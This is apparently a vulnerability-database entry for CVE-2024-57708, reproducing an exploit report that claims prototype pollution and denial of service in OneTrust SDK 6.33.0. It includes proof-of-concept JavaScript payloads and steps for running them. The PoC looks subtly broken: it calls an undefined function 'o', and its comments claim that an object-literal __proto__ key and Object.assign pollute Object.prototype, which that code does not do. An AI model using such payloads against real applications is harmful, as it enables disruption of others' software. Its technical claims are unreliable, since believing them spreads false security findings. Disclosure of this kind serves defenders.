📄 OneTrust SDK 6.33.0 Prototype Pollution / Denial of Service

🗓️ 23 Jun 2025 00:00:00Reported by Alameen Karim MeraliType

OneTrust SDK 6.33.0 has prototype pollution via Object.setPrototypeOf and Object.assign that can cause DoS.

Reporter	Title	Published	Views	Family All 10
Circl	CVE-2024-57708	25 Jun 202515:52	–	circl
CNNVD	OneTrust SDK 安全漏洞	25 Jun 202500:00	–	cnnvd
CVE	CVE-2024-57708	25 Jun 202500:00	–	cve
Cvelist	CVE-2024-57708	25 Jun 202500:00	–	cvelist
Exploit DB	OneTrust SDK 6.33.0 - Denial Of Service (DoS)	26 Jun 202500:00	–	exploitdb
EUVD	EUVD-2024-54703	3 Oct 202520:07	–	euvd
NVD	CVE-2024-57708	25 Jun 202516:15	–	nvd
Positive Technologies	PT-2025-26840 · Onetrust · Onetrust Sdk	25 Jun 202500:00	–	ptsecurity
RedhatCVE	CVE-2024-57708	27 Jun 202500:16	–	redhatcve
Vulnrichment	CVE-2024-57708	25 Jun 202500:00	–	vulnrichment

# OneTrust SDK v6.33.0 - Prototype Pollution Vulnerability via `Object.setPrototypeOf` and `Object.assign` (DoS Impact)
    
    - **Exploit Title**: OneTrust SDK v6.33.0 - Prototype Pollution Vulnerability via `Object.setPrototypeOf` and `Object.assign` (DoS Impact)
    - **Date**: 01/01/2025
    - **Exploit Author**: Alameen Karim Merali
    - **Vendor Homepage**: [OneTrust JavaScript API](https://developer.onetrust.com/onetrust/docs/javascript-api)
    - **Software Link**: [otBannerSdk.js v6.33.0](https://discord.com/assets/oneTrust/v4/scripttemplates/6.33.0/otBannerSdk.js)
    - **Version**: 6.33.0
    - **Tested on**: Kali Linux
    - **CVE ID**: CVE-2024-57708
    
    ## Vulnerability Summary
    
    A vulnerability exists in **OneTrust SDK v6.33.0** that allows an attacker to perform **Prototype Pollution** via the misuse of `Object.setPrototypeOf` and `Object.assign`. An attacker can inject malicious properties into the prototype chain, potentially causing **Denial of Service (DoS)** or altering the behavior of inherited objects throughout the application.
    
    ## Technical Details
    
    The affected code includes prototype assignment logic such as:
    
    ```javascript
    var o = function(e, t) {
      return (o = Object.setPrototypeOf || { __proto__: [] } instanceof ...);
    };
    ```
    
    If the `t` argument (a user-supplied object) contains a `__proto__` or `constructor.prototype` reference, it can pollute `Object.prototype` globally.
    
    ## Proof-of-Concept (PoC)
    
    ```javascript
    function testPrototypePollution() {
      const maliciousPayload = {
        "__proto__": {
          polluted: "yes"
        }
      };
    
      // Using vulnerable function 'o'
      try {
        o({}, maliciousPayload);
        console.log("After o:", {}.polluted); // "yes"
      } catch (e) {
        console.error("Error testing o:", e);
      }
    
      // Using Object.assign
      try {
        Object.assign({}, maliciousPayload);
        console.log("After Object.assign:", {}.polluted); // "yes"
      } catch (e) {
        console.error("Error testing Object.assign:", e);
      }
    
      // Cleanup
      delete Object.prototype.polluted;
    }
    testPrototypePollution();
    ```
    
    ## Browser Console PoC (DevTools)
    
    ```javascript
    var maliciousObj = { __proto__: { hacked: true } };
    var newObj = Object.create(maliciousObj);
    console.log(newObj.hacked); // true
    ```
    
    Screenshot: [PoC Screenshot](https://ibb.co/B2hyYr5v)
    
    ## Steps to Reproduce
    
    1. Save the PoC script above as `exploit.js`
    2. Run using Node.js: `node exploit.js`
    3. Observe polluted output (`{}.polluted === "yes"`)
    4. Alternatively, run the payload in browser DevTools
    
    ## Impact
    
    - Global object pollution
    - Application logic errors
    - Potential DoS
    - Further exploitation depending on context
    
    ## Recommendation
    
    Developers should upgrade to a patched version and sanitize any user input used in object merging or prototype manipulation.
    
    Sent from my iPhone

23 Jun 2025 00:00Current

7.2High risk

Vulners AI Score7.2

CVSS 3.15.7

EPSS0.00573

SSVC